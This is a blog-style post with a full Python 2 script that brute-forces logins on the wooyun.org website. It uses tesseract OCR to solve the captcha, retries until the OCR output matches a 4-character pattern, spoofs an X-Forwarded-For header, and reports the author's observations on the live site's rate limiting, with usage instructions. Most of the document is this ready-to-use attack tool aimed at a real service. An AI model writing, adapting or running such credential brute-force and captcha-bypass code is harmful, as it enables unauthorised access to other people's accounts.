The following must be installed first:
1. pytesseract (can be installed with pip install pytesseract)
2. Python Imaging Library (PIL)
3. tesseract-ocr
How it works:
1. Use tesseract to recognize the captcha.
2. Brute-force the login by POST.
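Issue 1: captcha recognition rate
The OCR result goes through one filtering step. As the regex pattern = '^[a-zA-Z0-9]{4}$' shows, only results recognized as exactly 4 alphanumeric characters are accepted; anything else is discarded and a new captcha is requested. This greatly improves the effective recognition rate.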
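The filtering step can be sketched on its own as below. This is a minimal sketch rather than the author's exact code: the helper name clean_ocr_result is hypothetical, and stripping whitespace plus using \Z instead of $ are my assumptions. They are there because OCR output often ends with a newline, and in Python $ also matches just before a trailing newline.

```python
import re

# Same character class and length as the pattern in the article.
# \Z anchors at the very end of the string, whereas $ would also
# match just before a trailing newline.
CAPTCHA_RE = re.compile(r'^[a-zA-Z0-9]{4}\Z')


def clean_ocr_result(raw_text):
    """Return the 4-character code, or None if the OCR output is unusable.

    Hypothetical helper: raw_text stands for whatever string the OCR
    engine returned for one captcha image.
    """
    candidate = raw_text.strip()  # drop surrounding whitespace/newlines
    if CAPTCHA_RE.match(candidate):
        return candidate
    return None
```

A result of None means the image should be thrown away and a fresh captcha requested, which is what the retry loop in the script does.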
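Issue 2: server-side rate limiting
Over two days of testing I observed that there is a limit on the number of attempts in the morning, yet on both afternoons I made more than 1161 login attempts without hitting any limit. I do not know why; it may have been a problem with my network.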
# coding: utf-8
# date: 2014/09/23
# author: titans
# Python 2 script (uses cookielib / urllib2 and print statements).
import cookielib
import urllib2
import urllib
import socket
import sys
import time
import re
from PIL import Image
import pytesseract

def guess_login(url, users, passwords):
    # Keep the session cookie across the captcha and login requests.
    cj = cookielib.CookieJar()
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
    opener.addheaders = [
        ('User-Agent', 'Mozilla/5.0 (Windows NT 5.1; rv:24.0) Gecko/20100101 Firefox/24.0'),
        ('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'),
        ('Accept-Encoding', 'gzip, deflate'),
        ('Connection', 'keep-alive'),
        ('X-Forwarded-For', '127.0.0.1'),
    ]
    urllib2.install_opener(opener)
    captcha = ''
    catp_url = 'http://www.wooyun.org/captcha.php'
    # Accept only OCR results that are exactly 4 alphanumeric characters.
    pattern = '^[a-zA-Z0-9]{4}$'
    regex = re.compile(pattern)
    for user in users:
        user = user.strip()
        find = False
        for password in passwords:
            while_mark = 1
            password = password.strip()
            # Retry until the OCR yields a plausible captcha for this pair.
            while while_mark:
                opener.open(url)
                pic = opener.open(catp_url)
                content = pic.read()
                f = open('c:\\temp\\capta.jpg', 'wb')
                f.write(content)
                f.close()
                time.sleep(1)
                captcha = pytesseract.image_to_string(Image.open('c:\\temp\\capta.jpg'))
                # OCR output may carry trailing whitespace or a newline.
                captcha = captcha.strip()
                re_result = regex.match(captcha)
                if re_result:
                    print user, password, captcha
                    post_data = 'email=%s&password=%s&captcha=%s' % (user, password, captcha)
                    post_url = 'http://www.wooyun.org/user.php?action=login&do=login'
                    resp = opener.open(post_url, post_data)
                    while_mark = 0
                    # A Set-Cookie header in the response is treated as success.
                    cookies = resp.info().getheaders('Set-Cookie')
                    if len(cookies):
                        find = True
                        raw_input('get it!!%s %s' % (user, password))
                else:
                    print '[*]repeat request'
            if find:
                break

def usage():
    print 'wooyun.py users.txt passwords.txt'
    sys.exit(0)

def run():
    if len(sys.argv) != 3:
        usage()
    url = 'http://www.wooyun.org/user.php?action=login'
    users = open(sys.argv[1], 'r').readlines()
    passwords = open(sys.argv[2], 'r').readlines()
    guess_login(url, users, passwords)

if __name__ == '__main__':
    run()
The script is written for Windows. To test it on Linux, change the path where the captcha image is saved (c:\temp\capta.jpg) to a Linux path.
Usage: wooyun.py users.txt passwords.txt
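To avoid editing the path by hand on each platform, the image location could be derived from the system temporary directory. This is only a sketch of that idea and is not in the original script: the function name captcha_path is hypothetical, and the default file name is copied from the article.

```python
import os
import tempfile


def captcha_path(filename='capta.jpg'):
    """Build a path for the captcha image inside the OS temp directory.

    Hypothetical helper; tempfile.gettempdir() picks a suitable temp
    directory for the current platform, so no path needs to be edited.
    """
    return os.path.join(tempfile.gettempdir(), filename)
```

Both the open() call that writes the image and the Image.open() call that reads it back would then use the same captcha_path() value.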